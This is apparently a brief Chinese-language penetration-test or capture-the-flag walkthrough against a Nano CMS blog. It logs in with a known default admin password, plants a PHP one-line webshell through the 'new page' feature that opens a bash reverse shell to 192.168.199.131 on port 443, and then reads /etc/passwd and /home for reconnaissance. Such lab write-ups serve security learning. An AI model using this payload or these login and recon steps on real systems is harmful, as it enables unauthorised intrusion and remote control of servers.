- 打开80端口,经过观察点开blog,发现显示nano cms 通过网上搜查可以发现admin用户登入密码是shannon,登入后
- 可以寻找哪里能插入php一句话脚本,发现在new page可以,写入一句话木马<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.199.131/443 0>&1'");?>
- 监听443端口。反弹shell
- 查看/etc/passwd /home等目录收集关键信息。
whoami 查看当前是apache用户没有bash解释器